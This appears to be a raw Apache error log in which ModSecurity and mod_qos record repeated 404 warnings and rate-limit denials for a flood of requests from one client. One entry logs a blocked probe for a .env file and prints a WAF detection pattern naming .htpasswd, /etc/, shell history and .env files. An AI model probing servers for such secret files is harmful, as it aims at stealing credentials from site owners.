[Tue May 26 19:54:01.350418 2026] [security2:error] [pid 93868:tid 94363] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FjQAAAfg"]
[Tue May 26 19:54:01.369981 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMlwAAABM"]
[Tue May 26 19:54:01.371408 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FkwAAAa4"]
[Tue May 26 19:54:01.376853 2026] [security2:error] [pid 93868:tid 94262] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FmAAAAZM"]
[Tue May 26 19:54:01.377468 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMlgAAAF8"]
[Tue May 26 19:54:01.392069 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FmQAAAfI"]
[Tue May 26 19:54:01.400595 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FlgAAAck"]
[Tue May 26 19:54:01.404815 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAGDRMqfxdEDkoszMqgAAADg"]
[Tue May 26 19:54:01.406882 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAGDRMqfxdEDkoszMtQAAAEk"]
[Tue May 26 19:54:01.420656 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMnwAAAH8"]
[Tue May 26 19:54:01.437856 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6KyzgAAAJw"]
[Tue May 26 19:54:01.446739 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAGDRMqfxdEDkoszMrAAAAFk"]
[Tue May 26 19:54:01.449381 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAEqK9k_ZUB2Vp25FqAAAAcc"]
[Tue May 26 19:54:01.453252 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMmQAAABU"]
[Tue May 26 19:54:01.454271 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6KyzAAAAJQ"]
[Tue May 26 19:54:01.458280 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAEqK9k_ZUB2Vp25FqQAAAak"]
[Tue May 26 19:54:01.461373 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAGDRMqfxdEDkoszMrgAAADk"]
[Tue May 26 19:54:01.573114 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzVQAAAPQ
[Tue May 26 19:54:01.576355 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAWDRMqfxdEDkoszM4wAAACA
[Tue May 26 19:54:01.589580 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzVgAAAMs
[Tue May 26 19:54:01.596681 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzVwAAAK0
[Tue May 26 19:54:01.600902 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzWAAAANU
[Tue May 26 19:54:01.609686 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzWgAAAP4
[Tue May 26 19:54:01.610398 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzWQAAANA
[Tue May 26 19:54:01.614460 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzWwAAAPg
[Tue May 26 19:54:01.617374 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAWDRMqfxdEDkoszM5AAAABQ
[Tue May 26 19:54:01.617568 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzXAAAAN8
[Tue May 26 19:54:01.723762 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzYAAAAKc
[Tue May 26 19:54:01.725952 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAWDRMqfxdEDkoszM5QAAAGE
[Tue May 26 19:54:01.738886 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzYQAAAK8
[Tue May 26 19:54:01.750441 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzYgAAAJU
[Tue May 26 19:54:01.755955 2026] [qos:error] [pid 86490:tid 86631] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzZAAAAJA
[Tue May 26 19:54:01.757319 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzZQAAAM0
[Tue May 26 19:54:01.759691 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzZgAAAIs
[Tue May 26 19:54:01.769204 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzaQAAALY
[Tue May 26 19:54:01.770989 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAWDRMqfxdEDkoszM5gAAABw
[Tue May 26 19:54:01.773386 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzawAAAJo
[Tue May 26 19:54:01.874435 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAWDRMqfxdEDkoszM6AAAACs
[Tue May 26 19:54:01.877946 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzcAAAAOE
[Tue May 26 19:54:01.888447 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzcQAAANs
[Tue May 26 19:54:01.904051 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzcgAAAQM
[Tue May 26 19:54:01.904933 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzcwAAAN0
[Tue May 26 19:54:01.911458 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzdAAAANY
[Tue May 26 19:54:01.912666 2026] [qos:error] [pid 86490:tid 86663] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzdQAAALA
[Tue May 26 19:54:01.925333 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAWDRMqfxdEDkoszM6gAAAFs
[Tue May 26 19:54:01.928345 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzdgAAAMk
[Tue May 26 19:54:01.932750 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzdwAAAPQ
[Tue May 26 19:54:01.982510 2026] [security2:error] [pid 86490:tid 86698] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtAVZMwN0DpLVWo6KzOAAAANM"]
[Tue May 26 19:54:02.023000 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAmDRMqfxdEDkoszM7AAAAGo
[Tue May 26 19:54:02.028128 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzewAAAP0
[Tue May 26 19:54:02.038554 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzfQAAALg
[Tue May 26 19:54:02.056876 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzfgAAAPI
[Tue May 26 19:54:02.058112 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzfwAAANg
[Tue May 26 19:54:02.061009 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzgQAAAJw
[Tue May 26 19:54:02.067122 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzgwAAAK8
[Tue May 26 19:54:02.151430 2026] [security2:error] [pid 93868:tid 94375] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/resources/lang/.env"] [unique_id "ahWtAkqK9k_ZUB2Vp25F0QAAAgQ"]
[Tue May 26 19:54:02.169680 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAmDRMqfxdEDkoszM7QAAABY
[Tue May 26 19:54:02.174262 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAmDRMqfxdEDkoszM7gAAACM
[Tue May 26 19:54:02.175159 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzhgAAALY
[Tue May 26 19:54:02.178206 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzhwAAAJo
[Tue May 26 19:54:02.187444 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KziAAAAOo
[Tue May 26 19:54:02.204503 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KziQAAAMg
[Tue May 26 19:54:02.211497 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzigAAAMM
[Tue May 26 19:54:02.219946 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KziwAAAQI
[Tue May 26 19:54:02.221186 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAlZMwN0DpLVWo6KzjAAAAKI
[Tue May 26 19:54:02.279996 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAGDRMqfxdEDkoszMsgAAAC0"]
[Tue May 26 19:54:02.282935 2026] [security2:error] [pid 86490:tid 86645] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky0gAAAJ4"]
[Tue May 26 19:54:02.287734 2026] [security2:error] [pid 86490:tid 86673] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky1QAAALo"]
[Tue May 26 19:54:02.292577 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAGDRMqfxdEDkoszMswAAAGg"]
[Tue May 26 19:54:02.298328 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAGDRMqfxdEDkoszMqwAAACo"]
[Tue May 26 19:54:02.300245 2026] [security2:error] [pid 93867:tid 94229] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAJCDfrjqoHpuuBKshwAAAYA"]
[Tue May 26 19:54:02.303909 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAEqK9k_ZUB2Vp25FpwAAAZQ"]
[Tue May 26 19:54:02.330424 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAEqK9k_ZUB2Vp25FsQAAAbU"]
[Tue May 26 19:54:02.353558 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAEqK9k_ZUB2Vp25FqgAAAdc"]
[Tue May 26 19:54:02.356670 2026] [security2:error] [pid 86490:tid 86715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky3QAAAOQ"]
[Tue May 26 19:54:02.359155 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky3gAAAIU"]
[Tue May 26 19:54:02.369433 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky4wAAAPY"]
[Tue May 26 19:54:02.371203 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky6gAAAI0"]
[Tue May 26 19:54:02.377973 2026] [security2:error] [pid 93867:tid 94122] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAJCDfrjqoHpuuBKsiAAAAVA"]
[Tue May 26 19:54:02.380021 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAWDRMqfxdEDkoszM1gAAAAQ"]
[Tue May 26 19:54:02.380471 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAEqK9k_ZUB2Vp25FrQAAAg0"]
[Tue May 26 19:54:02.381258 2026] [security2:error] [pid 86490:tid 86724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky7QAAAO0"]
[Tue May 26 19:54:02.383048 2026] [security2:error] [pid 86490:tid 86704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky3wAAANk"]
[Tue May 26 19:54:02.385152 2026] [security2:error] [pid 93867:tid 94065] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAJCDfrjqoHpuuBKsiQAAATU"]
[Tue May 26 19:54:02.386729 2026] [security2:error] [pid 93867:tid 94022] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAJCDfrjqoHpuuBKsiwAAARI"]
[Tue May 26 19:54:02.391562 2026] [security2:error] [pid 86490:tid 86680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky9AAAAME"]
[Tue May 26 19:54:02.392718 2026] [security2:error] [pid 86490:tid 86630] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAFZMwN0DpLVWo6Ky6wAAAI8"]
[Tue May 26 19:54:02.413699 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAEqK9k_ZUB2Vp25FsAAAAc0"]
